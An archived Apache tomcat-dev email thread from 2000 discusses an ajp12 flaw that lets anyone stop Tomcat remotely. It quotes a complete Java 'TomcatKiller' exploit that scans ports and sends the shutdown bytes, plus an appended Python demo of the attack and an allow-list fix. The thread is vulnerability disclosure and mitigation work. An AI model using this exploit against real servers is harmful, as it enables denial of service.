Return-Path:
Mailing-List: contact tomcat-dev-help@jakarta.apache.org; run by ezmlm
Delivered-To: mailing list tomcat-dev@jakarta.apache.org
Received: (qmail 78162 invoked from network); 6 Oct 2000 15:11:14 -0000
Received: from vortex.more.net (198.209.253.169) by locus.apache.org with SMTP; 6 Oct 2000 15:11:14 -0000
Received: from voyager.apg.more.net (b5fan.spg.more.net [207.160.133.142]) by vortex.more.net (8.11.0/8.11.0) with ESMTP id e96FBDu02796 for ; Fri, 6 Oct 2000 10:11:13 -0500 (CDT)
Sender: glenn@more.net
Message-ID: <39DDEB91.BBD2210D@voyager.apg.more.net>
Date: Fri, 06 Oct 2000 10:11:13 -0500
From: Glenn Nielsen
Organization: MOREnet
X-Mailer: Mozilla 4.7 [en] (X11; I; SunOS 5.7 i86pc)
X-Accept-Language: en
MIME-Version: 1.0
To: tomcat-dev@jakarta.apache.org
Subject: Re: Tomcat Security Vulnerability
References: <5E5BF8E44723D4119B6D00508BCC219A0202B3F5@mail1.hq.portera.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Spam-Rating: locus.apache.org 1.6.2 0/1000/N

Use of the Java SecurityManager requires a JVM version >= 1.2. And we are
still committed to shipping a version of Tomcat that compiles/runs under
JVM 1.1.x. So I don't think we should set up the security manager by
default. We might be able to provide an example server.xml and
tomcat.policy file.

I might have to make some minor changes to the tomcat_security.html docs
from 3.3 so that it matches the 3.2 release. I have not been playing
around with the 3.2 release branch, only the 3.3dev branch. I'll get the
3.2 release and do a final test of configuring/using the security manager
and update the tomcat_security.html file for the 3.2 release.

Regards,

Glenn

Michael Percy wrote:
> 
> Then we need to get all the latest (applicable) docs into the 3.2 release...
> and get everyone off of 3.1 and onto 3.2 ASAP. Possibly configure Tomcat to
> build with this packet filtering on the standard port(s) by default?
> 
> Regards,
> Mike
> 
> > -----Original Message-----
> > From: Glenn Nielsen [mailto:glenn@voyager.apg.more.net]
> > Sent: Thursday, October 05, 2000 5:20 PM
> > To: tomcat-dev@jakarta.apache.org
> > Subject: Re: Tomcat Security Vulnerability
> > 
> > 
> > If you check out the 3.3dev version from CVS you will find a link in the
> > docs to tomcat_security.html. This page documents how to use Tomcat
> > with the java security manager. In that doc it shows an example of how
> > to configure a tomcat.policy file to do IP filtering of where tomcat will
> > accept requests from on port 8007 using the java security manager.
> > 
> > As of tomcat 3.2, support for the java security manager has been added.
> > 
> > Regards,
> > 
> > Glenn
> > 
> > Michael Percy wrote:
> > > 
> > > All,
> > > Since I am uncertain how many of you check the tomcat-user list often, and I
> > > am not personally a Java developer, I wanted to get you all in the loop on
> > > this (and hopefully get some discussion going on a solution). What I am
> > > talking about is the "Tomcat Killer" thread on tomcat-user over the past
> > > hour. I have pasted in the mentioned thread below, in hopes that the people
> > > who can do something about it (the developers) will have comments on it. I am
> > > also curious as to whether or not ajpv13 is susceptible to this kind of
> > > attack, and am not sure how to go about finding out.
> > > 
> > > Regards,
> > > 
> > > Michael Percy
> > > QA Automation Eng.
> > > Portera Systems
> > > 
> > > > -----Original Message-----
> > > > From: Michael Percy [mailto:mpercy@portera.com]
> > > > Sent: Thursday, October 05, 2000 1:36 PM
> > > > To: 'tomcat-user@jakarta.apache.org'
> > > > Subject: RE: Tomcat Killer
> > > > 
> > > > 
> > > > I'd like to point out that many people who wish to run Tomcat (at home, on a
> > > > LAN, etc.) do not have a spare machine/router to filter packets. Plus, many
> > > > setups include multiple ports on which different connectors run (to keep
> > > > configurations separate, etc.) so one cannot just firewall 8007 and proclaim
> > > > all is well. This is very dangerous and should be changed/patched/upgraded!
> > > > If Tomcat requires a firewall to be run safely, then it is NOT a secure
> > > > product (it relies on the security of other, unrelated people and
> > > > products!). This must be taken care of.
> > > > 
> > > > On a related note, does anyone know if the JNI connector is susceptible to
> > > > this? If not, then this can be a short-term workaround (does it work yet?).
> > > > 
> > > > 
> > > > Regards,
> > > > 
> > > > Michael Percy
> > > > QA Automation Eng.
> > > > Portera Systems
> > > > 
> > > > 
> > > > > -----Original Message-----
> > > > > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com]
> > > > > Sent: Thursday, October 05, 2000 1:27 PM
> > > > > To: 'tomcat-user@jakarta.apache.org'
> > > > > Subject: RE: Tomcat Killer
> > > > > 
> > > > > 
> > > > > You would think that as long as your firewall only allows access to port 80
> > > > > and/or 8080 and not 8007 then you would be fine. Nice find though.
> > > > > 
> > > > > Josh
> > > > > 
> > > > > -----Original Message-----
> > > > > From: Sean Schofield [mailto:sean@schof.com]
> > > > > Sent: Thursday, October 05, 2000 1:23 PM
> > > > > To: tomcat-user@jakarta.apache.org
> > > > > Subject: Re: Tomcat Killer
> > > > > 
> > > > > 
> > > > > Cool find!
> > > > > 
> > > > > Couldn't this be protected against by a firewall filtering incoming traffic
> > > > > so both Apache and Tomcat are behind a firewall to the Internet and
> > > > > another firewall between these servers and the LAN? Then you would only
> > > > > have to worry about other servlets, etc. within the firewall messing things
> > > > > up. And even then I think you need root to create sockets, don't you?
> > > > > 
> > > > > Should this be posted to Bugtraq?
> > > > > 
> > > > > - schof
> > > > > 
> > > > > At 12:51 PM 10/5/00 -0700, you wrote:
> > > > > 
> > > > > >Hi all, just a word of warning about Tomcat 3.1 and from what I can
> > > > > >tell, 3.2beta4. Looking at the source code, if you're using Ajp12 for
> > > > > >the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> > > > > >batch/shell file does its job by sending "exit please" bytes to
> > > > > >Tomcat. It doesn't take much to spoof this, here's my TomcatKiller
> > > > > >class below. Just guess a host and port which may have Tomcat
> > > > > >running, and over it goes...
> > > > > >
> > > > > >I patched the sources so hopefully it won't happen to me ;)
> > > > > >
> > > > > >
> > > > > >import java.net.*;
> > > > > >import java.io.*;
> > > > > >
> > > > > >public class TomcatKiller {
> > > > > >
> > > > > >    // Usage: java TomcatKiller <host> [port | minport maxport]
> > > > > >    static public void main( String[] args ) {
> > > > > >
> > > > > >        if( args.length < 1 ) {
> > > > > >            System.err.println( "usage: TomcatKiller host [min [max]]" );
> > > > > >            System.exit( 1 );
> > > > > >        }
> > > > > >
> > > > > >        // The two bytes the "Stop Tomcat" script sends over ajp12.
> > > > > >        final byte SIGNAL = (byte)254;
> > > > > >        final byte BYEBYE = (byte)15;
> > > > > >        byte[] msg = { SIGNAL, BYEBYE };
> > > > > >
> > > > > >        // Default ajp12 connector port; an optional range can be scanned.
> > > > > >        int min = 8007, max = 8007;
> > > > > >        String host = args[0];
> > > > > >
> > > > > >        try {
> > > > > >            if( args.length > 1 )
> > > > > >                min = max = Integer.parseInt( args[1] );
> > > > > >            if( args.length > 2 )
> > > > > >                max = Integer.parseInt( args[2] );
> > > > > >            if( min > max ) {
> > > > > >                int tmp = min;
> > > > > >                min = max;
> > > > > >                max = tmp;
> > > > > >            }
> > > > > >            for( int i = min; i <= max; i++ ) {
> > > > > >                try {
> > > > > >                    Socket s = new Socket( host, i );
> > > > > >                    OutputStream os = s.getOutputStream();
> > > > > >                    os.write( msg );
> > > > > >                    os.flush();
> > > > > >                    s.close();
> > > > > >                    break;  // first open port gets the shutdown bytes
> > > > > >                } catch( ConnectException ce ) {
> > > > > >                    System.err.println( "conn refused " + i );
> > > > > >                } catch( IOException ioe ) {
> > > > > >                    ioe.printStackTrace();
> > > > > >                    break;
> > > > > >                }
> > > > > >            }
> > > > > >        } catch( Exception e ) {
> > > > > >            e.printStackTrace();
> > > > > >            System.exit( 1 );
> > > > > >        }
> > > > > >    }
> > > > > >}
> > > > > >
> > > > > >// eof
> > > > > >
> > > > > >
> > > > > >stu
> > > > > >
> > > > > >
> > > > > >-- 
> > > > > >Stuart Maclean, Research Associate
> > > > > >University of Washington
> > > > > >ITS Research Program, College of Engineering
> > > > > >Box 352500
> > > > > >Seattle, WA 98195-2500
> > > > > >Tel: (206) 543-0637
> > > > > >http://www.its.washington.edu
> > > > > >
> > > > > 
> > > 
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
> > > For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org
> > 
> > -- 
> > ----------------------------------------------------------------------
> > Glenn Nielsen                           glenn@more.net | /* Spelin donut madder |
> > MOREnet System Programming                             | * if iz ina coment.  |
> > Missouri Research and Education Network                | */                   |
> > ----------------------------------------------------------------------

-- 
----------------------------------------------------------------------
Glenn Nielsen                           glenn@more.net | /* Spelin donut madder |
MOREnet System Programming                             | * if iz ina coment.  |
Missouri Research and Education Network                | */                   |
----------------------------------------------------------------------
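The exchange the thread describes, as an added example that is not code from the thread, from TomcatKiller, or from Tomcat itself: a toy ajp12-style listener that receives the two shutdown bytes (0xFE 0x0F, the only protocol detail the page gives) and a client that sends them, with the source-address check the thread proposes as the fix. The check is done in the listener's own code here rather than through the tomcat.policy / SecurityManager mechanism Glenn refers to; the allow-list format, the use of an ephemeral loopback port instead of 8007, and the function names are assumptions of this example.

```python
# Added example, not code from the thread or from Tomcat.
# Models the ajp12 shutdown message quoted by Stuart Maclean (0xFE 0x0F)
# and the mitigation discussed in the thread: only honor the message from
# an allow-listed source address. Allow-list shape, loopback demo port and
# function names are assumptions of this example.
import ipaddress
import socket
import threading

SIGNAL = 0xFE  # (byte)254 in TomcatKiller
BYEBYE = 0x0F  # (byte)15 in TomcatKiller
SHUTDOWN_MSG = bytes([SIGNAL, BYEBYE])


def classify(first_bytes, peer_ip, allowed_peers=None):
    """Decide how a connector should treat the opening bytes of a connection.

    allowed_peers=None reproduces the unfiltered behaviour the thread warns
    about: any host that can reach the port can stop the server.
    allowed_peers is otherwise a list of CIDR strings (assumed format).
    Returns 'request', 'shutdown' or 'rejected'.
    """
    if first_bytes[:2] != SHUTDOWN_MSG:
        return "request"  # ordinary ajp12 traffic, handled elsewhere
    if allowed_peers is None:
        return "shutdown"  # vulnerable: no check on who asked
    addr = ipaddress.ip_address(peer_ip)
    if any(addr in ipaddress.ip_network(net) for net in allowed_peers):
        return "shutdown"
    return "rejected"


def send_kill(host, port):
    """What TomcatKiller does per port: connect and write the two bytes."""
    with socket.create_connection((host, port), timeout=2) as s:
        s.sendall(SHUTDOWN_MSG)


def listen_once(allowed_peers, ready, result):
    """Toy connector: accept one connection and classify its first bytes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))  # ephemeral port, stand-in for 8007
    srv.listen(1)
    result["port"] = srv.getsockname()[1]
    ready.set()
    conn, (peer_ip, _) = srv.accept()
    with conn:
        buf = b""
        while len(buf) < 2:  # read exactly the two header bytes
            chunk = conn.recv(2 - len(buf))
            if not chunk:
                break
            buf += chunk
        result["decision"] = classify(buf, peer_ip, allowed_peers)
    srv.close()


def demo(allowed_peers):
    """Run the exchange over loopback and return the connector's decision."""
    ready, result = threading.Event(), {}
    t = threading.Thread(target=listen_once, args=(allowed_peers, ready, result))
    t.start()
    ready.wait()
    send_kill("127.0.0.1", result["port"])
    t.join()
    return result["decision"]


if __name__ == "__main__":
    print("unfiltered (3.1 behaviour):", demo(None))
    print("allow only 10.0.0.0/8:     ", demo(["10.0.0.0/8"]))
    print("allow only loopback:       ", demo(["127.0.0.1/32"]))
```

Run it stand-alone and the three lines come out as shutdown, rejected, shutdown. The point of the allow-list on the connector itself, as opposed to a perimeter firewall, is Michael Percy's objection in the thread: a host inside the firewall that can reach 8007 is still able to send the two bytes, so the decision has to be made by the process that owns the port.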